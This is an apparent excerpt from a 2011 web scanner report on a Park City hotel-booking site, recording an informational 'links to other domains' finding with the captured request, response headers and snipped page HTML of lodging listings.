               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175627]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176196]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176192]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175981]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175982]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176194]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.8. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?clone_id=41&group_id=982
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:45:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 428616


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
                                       <link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/8fa9e98acf5e2b247caa70669df6c903.png' title='Parking' alt='Parking' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Parking']); toggle_amenity('4', 'aa5d43508b4cec0724f75af8ae868ca6.png', '8fa9e98acf5e2b247caa70669df6c903.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/1fc82576cbb0bcebaf66b495707dd675.png' title='Shuttle Service' alt='Shuttle Service' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Shuttle Service']); toggle_amenity('1', '4a91a9bdeccb5f084339608bb1039e67.png', '1fc82576cbb0bcebaf66b495707dd675.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/90d28b770896393a5d24deaa76adf104.png' title='Pets Allowed' alt='Pets Allowed' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Pets Allowed']); toggle_amenity('31', '9ce03aac14ae7f31e817e122d6f60bd4.png', '90d28b770896393a5d24deaa76adf104.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/45a53ad2386da6db59cbd753481a4ceb.png' title='Swimming Pool' alt='Swimming Pool' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Swimming Pool']); toggle_amenity('6', '73a521715679621c1f544cd26c6075d0.png', '45a53ad2386da6db59cbd753481a4ceb.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/071c76db840ec89a0ee32b4e813b2f88.png' title='Fitness Room' alt='Fitness Room' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Fitness Room']); toggle_amenity('2', '686566e8aaab6172c31b1f6b470c6e3b.png', '071c76db840ec89a0ee32b4e813b2f88.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/20b34cc2545d9bbfc011472d08597e19.png' title='Restaurants' alt='Restaurants' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Restaurants']); toggle_amenity('7', '042de5248e8fa72df3c87db8fc48345b.png', '20b34cc2545d9bbfc011472d08597e19.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/462fdff39e49769ef18a4e9c44691760.png' title='High Speed Internet' alt='High Speed Internet' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','High Speed Internet']); toggle_amenity('3', 'bfa9115d65ee2e68af501bd7cc5ac344.png', '462fdff39e49769ef18a4e9c44691760.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1398&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1398]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2c08f84f5f6cebbfafeb79b573924910.jpg" title="Carriage House Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1413&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1413]); ><img src="http://s3.amazonaws.com/book_direct_images/l_19a567de699313df4cd2d9f28e2cd33f.jpg" title="Red Pine Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1383&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1383]); ><img src="http://s3.amazonaws.com/book_direct_images/l_db4cadf298e14f47a95926c25087606c.jpg" title="Old Town Guest House"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1411&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1411]); ><img src="http://s3.amazonaws.com/book_direct_images/l_bb5ef24549b781ea64501b3093562538.jpg" title="Prospector Square Lodge & Conference Center"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1426&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1426]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a11a7104ddd179b256e77fe3f0c22d0a.jpg" title="Resorts West"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1449&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1449]); ><img src="http://s3.amazonaws.com/book_direct_images/l_7c07d47816e4f15128abada8b5d05924.jpg" title="Newpark Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1429&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1429]); ><img src="http://s3.amazonaws.com/book_direct_images/l_33c801674e73c1e7b542d0c721ca74f6.jpg" title="Stein Eriksen Lodge"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=7369&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',7369]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4479851d723539b1b9aafdc8788733a5.jpg" title="Waldorf Astoria Park City"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1432&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1432]); ><img src="http://s3.amazonaws.com/book_direct_images/l_63a19802a5b81e8243fa8be9beb55177.jpg" title="The Chateaux at Silver Lake"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1448&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1448]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f8c01d2b5755a239851e388436ec65b5.jpg" title="The Sky Lodge"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1427&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1427]); ><img src="http://s3.amazonaws.com/book_direct_images/l_00d97fe26b5df107dcb4fff4abf524f3.jpg" title="Silver King Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1389&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1389]); ><img src="http://s3.amazonaws.com/book_direct_images/l_014e8136e32c6e08fc4c5c410d3fa4b8.jpg" title="Woodside Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1493&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1493]); ><img src="http://s3.amazonaws.com/book_direct_images/l_92759ea5ad34825356e258a2597880a3.jpg" title="Jupiter Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1450&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1450]); ><img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" title="The Canyons Silverado Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1511&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1511]); ><img src="http://s3.amazonaws.com/book_direct_images/a44dd9ef324e7532f7e6b786404660e5.jpg" title="24 Daly House"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/57eb7130536632921d0c11351a0a7388.gif' title='Parking Not Available' alt='Parking Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/1560122293a8d9ce4d090a1f6f5f32b2.gif' title='High Speed Internet Not Available' alt='High Speed Internet Not Available' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1388&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1388]); ><img src="http://s3.amazonaws.com/book_direct_images/l_746d79cae7c16597c3ce2a0e220925a3.jpg" title="Washington School Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1455&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1455]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c7dd3e7c036e97661e0daff81f68ca3.jpg" title="Best Western Landmark Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1431&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1431]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a6a81cccd7ebdf5fb4ea5b8f947bb2ad.jpg" title="Westgate Park City Resort & Spa"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1400&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1400]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f7ccbd5f451ed855f22e07bb1fc8c679.jpg" title="Crestview Condominiums"></a>
...[SNIP]...
